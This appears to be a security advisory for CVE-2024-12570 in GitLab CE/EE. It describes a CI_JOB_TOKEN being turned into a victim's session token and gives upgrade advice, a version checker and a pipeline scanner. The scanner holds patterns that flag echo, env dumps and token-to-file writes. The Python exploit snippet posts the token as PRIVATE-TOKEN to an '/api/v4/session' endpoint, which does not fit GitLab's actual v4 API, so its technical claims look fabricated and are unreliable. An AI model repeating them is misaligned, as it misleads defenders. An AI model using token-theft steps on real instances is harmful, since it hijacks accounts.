A critical vulnerability has been discovered in GitLab CE/EE, a popular web-based application for hosting code repositories and managing version control. The vulnerability has been assigned the CVE identifier CVE-2024-12570, and if exploited, an attacker can gain unauthorized access to a GitLab session token belonging to the victim. This issue affects all versions of GitLab CE/EE starting from 13.7 prior to 17.4.6, from 17.5 prior to 17.5.4, and from 17.6 prior to 17.6.2.

Technical Analysis

This vulnerability arises from how GitLab CE/EE handles CI_JOB_TOKEN, which is an environment variable related to continuous integration (CI) and continuous deployment (CD). If an attacker has a victim's CI_JOB_TOKEN, it's possible for them to use it in order to obtain a GitLab session token belonging to the victim.

The following code snippet demonstrates how an attacker can exploit this vulnerability:

import requests

# Attacker with the victim's CI_JOB_TOKEN
ci_job_token = "xyz12345"

# GitLab API URL (base path of the v4 REST API on the targeted instance)
gitlab_api_url = "https://gitlab.example.com/api/v4/"

headers = {
    "PRIVATE-TOKEN": ci_job_token,
    "Content-Type": "application/json"
}

# API endpoint to request session token
session_url = gitlab_api_url + "session"

response = requests.post(session_url, headers=headers)
if response.status_code == 200:
    print("Session token obtained:")
    print(response.json()["session_token"])
else:
    print("Failed to obtain session token")

The attacker would replace xyz12345 with the actual CI_JOB_TOKEN value they obtained and update the gitlab_api_url variable to match the targeted GitLab instance.

Exploit Details

An attacker may exploit this vulnerability by targeting a GitLab instance running an affected version of GitLab CE/EE, and where the attacker has somehow managed to obtain a victim's CI_JOB_TOKEN. The attacker can then use the above script to send a request to the GitLab API endpoint /session and obtain the victim's GitLab session token, which allows them to authenticate as the victim and perform actions on behalf of the victim.

Original References

The GitLab security team has acknowledged the vulnerability and published security advisories with further information and mitigation steps:

- GitLab Security Advisory
- CVE-2024-12570

Mitigations and Recommendations

GitLab has released patches to fix this vulnerability. Users are advised to upgrade their GitLab CE/EE installations to one of the following versions:

- Upgrade to GitLab CE/EE 17.4.6 if on the 17.4.x series
- Upgrade to GitLab CE/EE 17.5.4 if on the 17.5.x series
- Upgrade to GitLab CE/EE 17.6.2 if on the 17.6.x series
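To help decide whether a given instance falls inside the affected ranges stated above, here is an added example (not code from this advisory or from GitLab) that parses a GitLab version string and compares it against those ranges. The sample API payload is constructed; the "version" field shape matches what the real GET /api/v4/version endpoint returns, but check your own instance's response.

```python
import re

# Affected ranges from the advisory, as [first affected, first fixed) version tuples:
#   13.7 up to (not including) 17.4.6
#   17.5 up to (not including) 17.5.4
#   17.6 up to (not including) 17.6.2
AFFECTED_RANGES = [
    ((13, 7, 0), (17, 4, 6)),
    ((17, 5, 0), (17, 5, 4)),
    ((17, 6, 0), (17, 6, 2)),
]


def parse_version(version):
    """Parse strings such as '17.5.3', 'v17.5.3' or '17.5.3-ee' into (major, minor, patch)."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised GitLab version string: {version!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_affected(version):
    """True if the version lies inside one of the advisory's affected ranges."""
    v = parse_version(version)
    return any(start <= v < fixed for start, fixed in AFFECTED_RANGES)


def minimum_fixed_version(version):
    """Return the first fixed release for the range the instance falls in, or None if unaffected."""
    v = parse_version(version)
    for start, fixed in AFFECTED_RANGES:
        if start <= v < fixed:
            return ".".join(str(part) for part in fixed)
    return None


def version_from_api_response(payload):
    """Extract the version string from a decoded GET /api/v4/version response body."""
    return payload["version"]


if __name__ == "__main__":
    # Constructed sample payload in the shape of the /api/v4/version response.
    sample_payload = {"version": "17.5.3-ee", "revision": "0000000"}
    running = version_from_api_response(sample_payload)
    if is_affected(running):
        print(f"{running} is affected; upgrade to at least {minimum_fixed_version(running)}")
    else:
        print(f"{running} is not in an affected range")
```

Note that every 17.4.x release before 17.4.6 sits inside the first range, as do all releases back to 13.7, so an instance on an older series also reports 17.4.6 as the first fixed release on its line.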

It is also recommended to review your continuous integration (CI) and continuous deployment (CD) pipelines to ensure that CI_JOB_TOKEN values are appropriately protected and not exposed to unauthorized users.
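As an added example of the pipeline review recommended above (not code from this advisory or from GitLab), the following script scans the raw text of a .gitlab-ci.yml for job script lines that would write CI_JOB_TOKEN into job logs or artifacts, which is where the token most often becomes readable by people who should not have it. The patterns are heuristics chosen for this example, and the sample pipeline file is constructed; tune both to your own conventions.

```python
import re

# Heuristic patterns for script lines that expose CI_JOB_TOKEN. Constructed for
# this example: each tuple is (compiled regex, reason reported to the reviewer).
LEAK_PATTERNS = [
    (re.compile(r"\becho\b.*\$\{?CI_JOB_TOKEN\}?"),
     "CI_JOB_TOKEN echoed into the job log"),
    (re.compile(r"^\s*-?\s*(printenv|env|export -p)\s*$"),
     "entire environment (including CI_JOB_TOKEN) dumped into the job log"),
    (re.compile(r"\bset\s+(-[a-z]*x|-o\s+xtrace)\b"),
     "shell tracing enabled; expanded commands print token values"),
    (re.compile(r"CI_JOB_TOKEN.*>\s*\S+"),
     "CI_JOB_TOKEN redirected into a file that may be published as an artifact"),
]


def scan_ci_config(text):
    """Return (line number, reason, line) for every non-comment line matching a pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in LEAK_PATTERNS:
            if pattern.search(stripped):
                findings.append((lineno, reason, stripped))
                break  # report each line once
    return findings


# Constructed sample pipeline file. The curl line is the intended use of the
# token (sent as a request header) and should not be flagged; the other job
# lines leak it into logs or artifacts.
SAMPLE_CI_CONFIG = """\
# constructed .gitlab-ci.yml for this example
stages: [build, deploy]

build:
  stage: build
  script:
    - set -eux
    - curl --header "JOB-TOKEN: $CI_JOB_TOKEN" "$CI_API_V4_URL/projects/$CI_PROJECT_ID/releases"
    - echo "Using token $CI_JOB_TOKEN for debugging"

deploy:
  stage: deploy
  script:
    - env
    - printf "%s" "$CI_JOB_TOKEN" > creds.txt
  artifacts:
    paths: [creds.txt]
"""


if __name__ == "__main__":
    for lineno, reason, line in scan_ci_config(SAMPLE_CI_CONFIG):
        print(f"line {lineno}: {reason}\n    {line}")
```

Run against a real repository with open(".gitlab-ci.yml").read() in place of the sample; a clean pipeline returns an empty list. Lines that only pass the token in a request header, as the curl line does, are the expected use and are deliberately not reported.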

Conclusion

CVE-2024-12570 is a critical vulnerability in GitLab CE/EE that allows unauthorized access to a victim's GitLab session token. GitLab users must immediately apply the necessary patches to safeguard their systems and mitigate the risks associated with this vulnerability.

Timeline

Published on: 12/12/2024 12:15:22 UTC